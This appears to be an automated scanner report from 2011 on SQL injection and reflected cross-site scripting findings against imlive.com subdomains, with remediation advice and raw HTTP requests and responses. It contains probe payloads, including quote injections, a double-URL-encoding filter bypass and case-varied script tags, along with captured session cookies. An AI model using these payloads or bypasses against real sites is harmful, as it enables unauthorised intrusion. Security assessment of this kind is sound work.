SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:07 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQQQDTD=NAMDOIMAEMHFENAMDMFANDKA; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:07 GMT Connection: close Content-Length: 8336 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess'/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:08 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess''/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSTRTBSD=DEBIMIMACEBMBLPLGCGPGBPD; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:08 GMT Connection: close Content-Length: 8237 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:23 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:22 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSRTQCRC=BGLJMIMACIIMCJCMFKACJEGI; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:22 GMT Connection: close Content-Length: 8230 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/' HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:23 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/'' HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:24 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQQRCSC=CMMFJIMAHFOLCAODNFPHKCBL; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:23 GMT Connection: close Content-Length: 8249 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:34 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:34 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQRQRCTC=ABOPGJMANIICBDDCLAFKMEHJ; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:35 GMT Connection: close Content-Length: 8333 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:25:08 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQSRBSD=MDONOIMAHFCJJOAEABNJMFBH; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:08 GMT Connection: close Content-Length: 8441 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:25:27 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRTQDQC=DLPLFJMAFKGAEJJBLHMDPHAI; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:28 GMT Connection: close Content-Length: 8441 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:25:47 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:48 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRTRBSD=FAKPGKMALJJINONJKHHPMGGB; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:47 GMT Connection: close Content-Length: 8333 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527 HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:31:40 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527%2527 HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:31:40 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRTRBSD=ABKPGKMAHOCFOJMDCOENFMKF; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:31:40 GMT Connection: close Content-Length: 8250 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ar.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47=1 HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||94ad3"><script>alert(1)</script>4f479a42c47~1');return false;"> ...[SNIP]...
2.2. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ar.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26eb"><script>alert(1)</script>f467ed2684e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?b26eb"><script>alert(1)</script>f467ed2684e=1 HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/ X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 16:44:27 GMT Connection: close Content-Length: 21363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?b26eb"><script>alert(1)</script>f467ed2684e=1');return false;"> ...[SNIP]...
2.3. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ar.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3ce'-alert(1)-'6c601d061a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?5b3ce'-alert(1)-'6c601d061a=1 HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f889"><script>alert(1)</script>305652e0e15 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=5f889"><script>alert(1)</script>305652e0e15&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 650a2"><script>alert(1)</script>068f5418f8 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
